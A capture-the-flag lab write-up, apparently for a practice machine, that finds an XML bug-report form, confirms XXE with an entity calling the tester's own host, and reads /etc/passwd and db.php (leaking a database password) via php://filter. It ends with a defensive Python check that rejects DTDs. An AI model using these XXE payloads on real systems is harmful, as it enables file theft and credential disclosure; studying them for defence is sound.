# 2 :80 xxe

```bash
$ gobuster dir -u 10.10.11.100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 80 -x php,html,txt
===============================================================
/assets               (Status: 301) [Size: 313] [--> http://10.10.11.100/assets/]
/resources            (Status: 301) [Size: 316] [--> http://10.10.11.100/resources/]
/portal.php           (Status: 200) [Size: 125]
/css                  (Status: 301) [Size: 310] [--> http://10.10.11.100/css/]
/index.php            (Status: 200) [Size: 25169]
/db.php               (Status: 200) [Size: 0]
/js                   (Status: 301) [Size: 309] [--> http://10.10.11.100/js/]


http://10.10.11.100/resources/README.txt
Tasks:
[ ] Disable 'test' account on portal and switch to hashed password. Disable nopass.
[X] Write tracker submit script
[ ] Connect tracker submit script to the database
[X] Fix developer group permissions

http://10.10.11.100/portal.php
Portal under development. Go <a href="log_submit.php">here</a> to test the bounty tracker.

http://10.10.11.100/log_submit.php
Bounty Report System - Beta
# contains form to report bugs

# understanding how the data is sent: Burp shows the form data arriving encoded
data entered on form > base64 > url_encode > sent.

Using CyberChef we can reproduce that recipe; using Burp we can then edit the decoded XML and try XXE attacks

https://book.hacktricks.xyz/pentesting-web/xxe-xee-xml-external-entity

# adding this to our sent data
<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://10.10.16.161"> %xxe; ]>

$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.100 - - [01/Aug/2021 22:11:38] "GET / HTTP/1.0" 200 -

# the callback hits our listener, so the parser resolves external entities: time to XXE
# Using the file-read payload from https://book.hacktricks.xyz/pentesting-web/xxe-xee-xml-external-entity#read-file

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "/etc/passwd"> ]>
<bugreport>
   <title>k</title>
   <cwe>k</cwe>
   <cvss></cvss>
   <reward>&xxe;</reward>
</bugreport>

# /etc/passwd
root:x:0:0:root:/root:/bin/bash
[truncated]
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
development:x:1000:1000:Development:/home/development:/bin/bash


# tried using RCE with expect://id
# did NOT WORK; tried a lot

# moving back to reading files, we now try to read db.php the same way
# does not work: nothing comes back.
# php files are not readable as-is, because the raw source contains <?php ... ?>, which is not
# well-formed XML once substituted into the entity; the file needs to be encoded first

Using the second payload (php://filter base64 wrapper) from: https://book.hacktricks.xyz/pentesting-web/xxe-xee-xml-external-entity#read-file

# <!DOCTYPE replace [<!ENTITY example SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"> ]>
# <data>&example;</data>

# code
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/db.php"> ]>
<bugreport>
   <title>k</title>
   <cwe>k</cwe>
   <cvss></cvss>
   <reward>&xxe;</reward>
</bugreport>

# the payload after base64 + url_encode, i.e. what is actually sent
PD94bWwgIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IklTTy04ODU5LTEiPz4KPCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgeHhlIFNZU1RFTSAicGhwOi8vZmlsdGVyL2NvbnZlcnQuYmFzZTY0LWVuY29kZS9yZXNvdXJjZT0vdmFyL3d3dy9odG1sL2RiLnBocCI%2BIF0%2BCjxidWdyZXBvcnQ%2BCiAgIDx0aXRsZT5rPC90aXRsZT4KICAgPGN3ZT5rPC9jd2U%2BCiAgIDxjdnNzPjwvY3Zzcz4KICAgPHJld2FyZD4meHhlOzwvcmV3YXJkPgo8L2J1Z3JlcG9ydD4%3D

# response after sending via Burp
Title: 	k
CWE: 	k
Score: 	
Reward: 	PD9waHAKLy8gVE9ETyAtPiBJbXBsZW1lbnQgbG9naW4gc3lzdGVtIHdpdGggdGhlIGRhdGFiYXNlLgokZGJzZXJ2ZXIgPSAibG9jYWxob3N0IjsKJGRibmFtZSA9ICJib3VudHkiOwokZGJ1c2VybmFtZSA9ICJhZG1pbiI7CiRkYnBhc3N3b3JkID0gIm0xOVJvQVUwaFA0MUExc1RzcTZLIjsKJHRlc3R1c2VyID0gInRlc3QiOwo/Pgo=

# Reward field base64-decoded: the db.php source
<?php
// TODO -> Implement login system with the database.
$dbserver = "localhost";
$dbname = "bounty";
$dbusername = "admin";
$dbpassword = "m19RoAU0hP41A1sTsq6K";
$testuser = "test";
?>
```
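As an added defender-side example (not code from the writeup or from the box), here is how the tracker's submit handler could reverse the observed decode chain and refuse the DTD that every XXE payload above depends on, before parsing only the expected fields. Function names and the benign sample report are constructed for this example.

```python
import base64
import re
import urllib.parse
import xml.etree.ElementTree as ET

# Defender-side check for the chain seen in Burp: form data -> base64 -> url_encode -> sent.
# Function names and the sample report are constructed for this example, not the portal's code.
DTD_MARKER = re.compile(rb"<!DOCTYPE|<!ENTITY")
EXPECTED_FIELDS = ("title", "cwe", "cvss", "reward")

def encode_submission(xml_text: str) -> str:
    """Mirror of the client-side chain; used here only to build test input."""
    return urllib.parse.quote(base64.b64encode(xml_text.encode("latin-1")).decode())

def decode_submission(data: str) -> bytes:
    """Reverse the chain: url_decode, then base64-decode, giving raw XML bytes."""
    # unquote, not unquote_plus: '+' is a base64 digit here, not an encoded space
    return base64.b64decode(urllib.parse.unquote(data), validate=True)

def inspect_submission(data: str) -> dict:
    """Decode like the portal does, refuse any DTD, then read only the expected fields."""
    try:
        xml_bytes = decode_submission(data)
    except ValueError:  # binascii.Error is a ValueError subclass
        return {"accepted": False, "reason": "not valid base64"}
    # A bug report never needs a DTD; rejecting one up front blocks every variant on this
    # page: the OOB parameter entity, the /etc/passwd read and the php://filter wrapper.
    if DTD_MARKER.search(xml_bytes):
        return {"accepted": False, "reason": "DTD/entity declaration in submission"}
    try:
        root = ET.fromstring(xml_bytes)  # expat: no external entity fetch, no network
    except ET.ParseError as exc:
        return {"accepted": False, "reason": f"malformed XML: {exc}"}
    if root.tag != "bugreport":
        return {"accepted": False, "reason": "unexpected root element"}
    return {"accepted": True,
            "fields": {tag: (root.findtext(tag) or "") for tag in EXPECTED_FIELDS}}

# Constructed benign report in the page's <bugreport> format, and the page's db.php payload.
BENIGN_XML = ('<?xml version="1.0" encoding="ISO-8859-1"?><bugreport><title>k</title>'
              '<cwe>k</cwe><cvss></cvss><reward>100</reward></bugreport>')
XXE_XML = ('<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM '
           '"php://filter/convert.base64-encode/resource=/var/www/html/db.php"> ]>'
           '<bugreport><title>k</title><cwe>k</cwe><cvss></cvss><reward>&xxe;</reward></bugreport>')

if __name__ == "__main__":
    for name, xml in (("benign", BENIGN_XML), ("xxe", XXE_XML)):
        print(name, inspect_submission(encode_submission(xml)))
```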
